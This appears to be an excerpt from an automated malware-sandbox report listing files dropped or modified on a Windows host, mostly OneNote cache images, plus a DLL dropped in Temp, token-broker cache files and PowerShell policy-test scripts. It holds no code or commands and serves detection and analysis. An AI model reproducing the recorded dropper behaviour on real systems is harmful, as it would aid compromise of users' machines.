C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004C.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004D.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004E.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004F.bin

OpenPGP Secret Key

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004G.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004H.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004I.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004J.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004K.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004L.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004M.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004N.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004O.bin

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004P.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004Q.bin

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004R.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004S.bin

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004T.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004U.bin

PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004V.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000050.bin

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000051.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000052.bin

JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000053.bin

JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000054.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000055.bin

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000056.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000057.bin

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000058.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000059.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005A.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005B.bin

PNG image data, 40 x 623, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005C.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005D.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005E.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005F.bin

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005G.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005H.bin

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005I.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005J.bin

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005K.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005L.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005M.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005N.bin

PNG image data, 60 x 336, 4-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005O.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005P.bin

PNG image data, 40 x 617, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005Q.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005R.bin

PNG image data, 50 x 600, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005S.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005T.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005U.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005V.bin

PNG image data, 77 x 627, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000060.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000061.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000062.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000063.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000064.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000065.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000066.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000067.bin

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000068.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000069.bin

PNG image data, 176 x 513, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006A.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006B.bin

PNG image data, 40 x 650, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006C.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006D.bin

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006E.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006F.bin

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006G.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006H.bin

PNG image data, 50 x 556, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006I.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006J.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006K.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006L.bin

PNG image data, 171 x 552, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006M.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006N.bin

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006O.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006P.bin

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006Q.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006R.bin

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006S.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006T.bin

Windows Enhanced Metafile (EMF) image data version 0x10000

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006U.bin

PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006V.bin

Windows Enhanced Metafile (EMF) image data version 0x10000

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000070.bin

PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000071.bin

Windows Enhanced Metafile (EMF) image data version 0x10000

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000072.bin

PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000073.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000074.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000075.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000076.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000077.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000078.bin

PNG image data, 50 x 500, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000079.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007A.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007B.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007C.bin

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007D.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007E.bin

Windows Enhanced Metafile (EMF) image data version 0x10000

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007F.bin

PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007G.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007H.bin

PNG image data, 39 x 600, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007I.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007J.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007K.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007L.bin

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007M.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007N.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007O.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007P.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007Q.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007R.bin

PNG image data, 39 x 579, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007S.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007T.bin

PNG image data, 30 x 700, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007U.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007V.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000080.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000081.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000082.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000083.bin

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000084.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000085.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000086.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000087.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000088.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000089.bin

PNG image data, 85 x 470, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008A.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008B.bin

PNG image data, 88 x 574, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008C.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008D.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008E.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008F.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008G.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008H.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008I.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008J.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008K.bin

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008L.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008M.bin

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008N.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008O.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

data

dropped

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres

data

dropped

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

data

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\X4QZWFTE.htm

HTML document, Unicode text, UTF-8 text, with very long lines (2498), with CRLF, LF line terminators

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\t5[1]

ASCII text, with no line terminators

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

data

modified

C:\Users\user\AppData\Local\Temp\76d4c8d1.dll

PE32 executable (DLL) (console) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\Diagnostics\ONENOTE\App_1675794384334539900_D9937C0E-ABFA-4834-B815-2855C722B4AF.log

ASCII text, with very long lines (9330), with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\Diagnostics\ONENOTE\App_1675794384335329500_D9937C0E-ABFA-4834-B815-2855C722B4AF.log

data

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bhdxr3lf.vim.ps1

ASCII text, with no line terminators

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ct3sixwc.sxo.psm1

ASCII text, with no line terminators

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jipc3bjv.yiq.ps1

ASCII text, with no line terminators

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rr320nq5.40m.psm1

ASCII text, with no line terminators

dropped

C:\Users\user\AppData\Local\Temp\{022223DD-4393-4800-9B44-EFAE9FCA242C}

GIF image data, version 89a, 1012 x 327

dropped

C:\Users\user\AppData\Local\Temp\{060BF765-B4B1-4F0B-9D62-FEE33E9126CB}

PNG image data, 85 x 470, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{073EE088-BE25-4FDC-AB41-8868AC1183B5}

Windows Enhanced Metafile (EMF) image data version 0x10000

dropped

C:\Users\user\AppData\Local\Temp\{0CD75E05-A671-4465-9AF9-A436BE94C381}

Windows Enhanced Metafile (EMF) image data version 0x10000

dropped

C:\Users\user\AppData\Local\Temp\{0F72757B-DF80-430E-AA36-048F27864243}

JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3

dropped

C:\Users\user\AppData\Local\Temp\{12E09907-A1C1-4548-A5C7-C3975664C4F1}

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3

dropped

C:\Users\user\AppData\Local\Temp\{147AC1E2-9435-4FD7-875C-C3438F50376D}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{14915C67-FA42-4C7F-90BF-986EC4B23022}

data

dropped

C:\Users\user\AppData\Local\Temp\{1637B3B5-F033-4BD0-812B-E7CD46BC61AF}

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3

dropped

C:\Users\user\AppData\Local\Temp\{1F0C731B-B953-4CF4-985D-D0CBDA3B8B6F}

PNG image data, 40 x 623, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{241167F7-1A2E-4DC2-AFA6-BB8DAACE9952}

PNG image data, 176 x 513, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{271561D9-4F71-40C0-A94E-FD91C5533589}

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3

dropped

C:\Users\user\AppData\Local\Temp\{272572A7-7936-408D-BAFC-2A335FF21DD2}

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3

dropped

C:\Users\user\AppData\Local\Temp\{2CE6039A-1ACC-49FD-B0B5-3B83455FFD97}

data

dropped

C:\Users\user\AppData\Local\Temp\{2EF04399-750A-4BB4-9C59-F8C94460230F}

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3

dropped

C:\Users\user\AppData\Local\Temp\{2FD46E66-A8DE-40AD-AC53-720FB627E9D0}

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3

dropped

C:\Users\user\AppData\Local\Temp\{31CD3F9F-7BA4-4E94-915D-46FD1FA51462}

JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3

dropped

C:\Users\user\AppData\Local\Temp\{31CDA264-3DC9-4FE2-9378-C03285DCA913}

PNG image data, 40 x 617, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{3229CA3A-663F-476B-9A83-D49A2C06B474}

PNG image data, 40 x 650, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{324B4E98-B972-4C36-B25A-8C8872A159E9}

JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3

dropped

C:\Users\user\AppData\Local\Temp\{34ACD608-9ED4-4600-BE9F-7303F40AE4E3}

JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3

dropped

C:\Users\user\AppData\Local\Temp\{34BE1FFC-4CC7-4724-96D7-E0D36FC79C64}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{360845C3-43D5-44A9-81F4-1457EA90FAC7}

data

dropped

C:\Users\user\AppData\Local\Temp\{3BABEB0F-E6F1-4EAD-BF38-0D872DC49164}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{3D5E9502-48E2-46F4-80DC-BEDDE9D85E6D}

data

dropped

C:\Users\user\AppData\Local\Temp\{3E514D54-F188-4442-A0EE-7779F6C88CCD}

